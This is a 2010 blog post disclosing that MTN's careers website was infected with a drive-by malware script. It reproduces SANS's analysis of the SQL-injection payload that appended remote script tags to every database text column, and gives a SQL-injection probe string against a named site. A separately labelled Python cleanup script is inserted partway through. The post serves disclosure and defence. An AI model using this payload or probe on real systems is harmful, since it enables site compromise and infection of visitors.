Saturday, September 4, 2010

Careers@MTN website INFECTED with MALWARE

URL compromised: http://careers.mtnonline.com
Threat level: HIGH (Do NOT visit for now)

I was going through the site 'Nairaland.com' and came across the 'Jobs & Vacancies' board. A vacancy from MTN caught my attention, and its link redirected me to Careers @ MTN, http://careers.mtnonline.com.

Now, going through the URL http://careers.mtnonline.com, I discovered a script was being called from www.adword71.com (obvious from the loading pane in Firefox). My curious self got the better of me, so I decided to dig up what I could.



A quick Ctrl+U (view page source) was done and the result is below.




Meaning that once you click on any link there, the JavaScript file 'b.js' gets to run.

Now the question is 'WHAT IS b.js?' and 'WHAT DOES IT DO?'

b.js is a malicious JavaScript file that gets executed on a user's PC when the user visits a website infected with it. The script looks for various vulnerabilities specific to the visiting OS and, when it finds one, pulls a .mov file from the dedicated domain www.adword71.com. That in turn invokes a file which installs a backdoor on the end user's machine. Victims are unlikely to know they have been infected because the installation is seamless and the malware uses few PC resources.

Mode of Attack

The only way this attack could have happened is through SQL INJECTION. The exploit was first seen in 2008 and was documented on SANS: http://isc.sans.edu/diary.html?n&storyid=4294 . After http://careers.mtnonline.com was found to be vulnerable to SQLi, the 'attacker' delivered an exploit payload that executed an iterative SQL loop: it located every user-created table in the remote database and appended a reference to a malicious client-side script (in this case 'b.js') to every text column within those tables.

As most database-driven web applications use data from the database to dynamically construct web content, the script is eventually presented to every user of the compromised website (http://careers.mtnonline.com). The injected tag instructs any browser that loads the infected page to execute the malicious script (b.js) hosted on a remote server (www.adword71.com). The purpose is to infect as many hosts with malware as possible. As seen in this case, this was a very SUCCESSFUL attack.

I am surprised it hasn't been patched by MTN till now. SQL injection is very much possible, as this request makes the server throw an ASP.NET error:

Code
departments.asp?id=1' OR '1'='1




As posted on SANS by Johannes Ullrich, the 'technical' analysis is below:

Let's go over this line by line:

First, two variables (T and C) are declared:

DECLARE @T VARCHAR(255),@C VARCHAR(255)

Next, we declare a "table_cursor". A table cursor will receive the output of a query line by line. It's essentially a "for" loop over all results returned by the query.

DECLARE Table_Cursor CURSOR FOR

The cursor is defined for the following query:

SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)

This SQL query uses one particular trick: sysobjects is a special table in SQL Server. It lists all the other tables available. syscolumns works similarly for all columns found in these tables.

The query selects all "objects" with an xtype of "u". These are tables created by the user. System tables (like "sysobjects" and "syscolumns") are ignored. Next, it limits the result to columns of type 35 (text), 231 (sysname) and 167 (varchar). These are datatypes that can hold a string of characters.

Our "cursor" will now retrieve all the results and assign them to the variables "T" (table name) and "C" (column name).

The next SQL statement will use these variables:

BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=[remote script URL, stripped by the blog's HTML rendering]></script>''')

For all values of these selected columns, the malicious JavaScript is added. As a result, you will see the JavaScript littered throughout the application. Wherever the website is using a string from the database, the JavaScript is now added. You frequently see it as part of the title tag.


As in this case, http://careers.mtnonline.com is littered with it.
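The defensive counterpart of the cursor walk above: once a site is known to carry this kind of mass-injection, the same "every text column of every user table" sweep can be done to find and strip the appended tag. This is an added example, not code from the post or from the SANS diary; it works on rows already pulled from the database as (table, column, value) tuples, assumes the site's own host is careers.mtnonline.com, and the sample rows (including the b.js path under www.adword71.com) are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# The site's own host (assumption); a script loaded from any other host is foreign.
SITE_HOST = "careers.mtnonline.com"

# Matches the <script src=...></script> tag the UPDATE statement appends to each value.
SCRIPT_TAG = re.compile(r'<script\s+src=["\']?([^"\'\s>]+)["\']?\s*>\s*</script>', re.I)


def _host_of(url):
    """Hostname of a script src, lower-cased; '' for relative (same-site) URLs."""
    return (urlparse(url).hostname or "").lower()


def injected_scripts(value, site_host=SITE_HOST):
    """Return the off-site hosts referenced by script tags found in a column value."""
    return [h for h in (_host_of(u) for u in SCRIPT_TAG.findall(value))
            if h and h != site_host]


def clean_value(value, site_host=SITE_HOST):
    """Undo the injection: drop off-site script tags, keep the site's own scripts,
    and trim the whitespace the RTRIM/concatenation step left behind."""
    def keep_or_drop(m):
        host = _host_of(m.group(1))
        return "" if host and host != site_host else m.group(0)
    return SCRIPT_TAG.sub(keep_or_drop, value).rstrip()


def scan_rows(rows, site_host=SITE_HOST):
    """rows: iterable of (table, column, value). Returns (table, column, host) findings."""
    return [(t, c, h) for t, c, v in rows for h in injected_scripts(v, site_host)]


# Constructed sample rows, modelled on what the payload leaves in text columns.
SAMPLE_ROWS = [
    ("departments", "name", "Customer Care<script src=http://www.adword71.com/b.js></script>"),
    ("departments", "name", "Engineering<script src=http://www.adword71.com/b.js></script>"),
    ("vacancies", "title", "Network Engineer II"),
    ("vacancies", "description", "Apply online <script src=/js/apply.js></script>"),
]

if __name__ == "__main__":
    for table, column, host in scan_rows(SAMPLE_ROWS):
        print(f"{table}.{column}: foreign script injected from {host}")
    print(clean_value(SAMPLE_ROWS[0][2]))  # -> Customer Care
```

Run against a real dump, the findings list is the evidence to hand to the site owner, and clean_value is the per-value transform for the cleanup UPDATE once the injection point itself is closed.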

A quick virus scan from AVG and VirusTotal shows the following:

1.) AVG

Exploit: Script injection 358 This page probably has a script reference injected into it. Generally, these pages are corrupted, rather than infective, but they are still potentially dangerous. This is known internally as type 358. Risk Category: Exploit Description: XPL's Intelligence Network has detected an exploit. An exploit is a piece of malware code that takes advantage of a vulnerability in a software application, usually the operating system or a web browser to infect a computer. Exploits usually target a computer by means of a drive-by download – the user has no idea that a download has even taken place. XPL recommends NOT visiting this web site regardless if your computer has been patched for the vulnerability. Scanned: Friday, September 03, 2010.



2.) VIRUS TOTAL





CONCLUSION

It's funny that a lot of graduates want that top job at MTN, and that will take them to http://careers.mtnonline.com . Now imagine how many people's computers are at present infected and compromised, as WebsiteOutlook shows mtnonline.com is getting 43257 page views per day. Do NOT visit the site till it gets fixed. Meanwhile, MTN have been contacted; let's hope they do something about it.
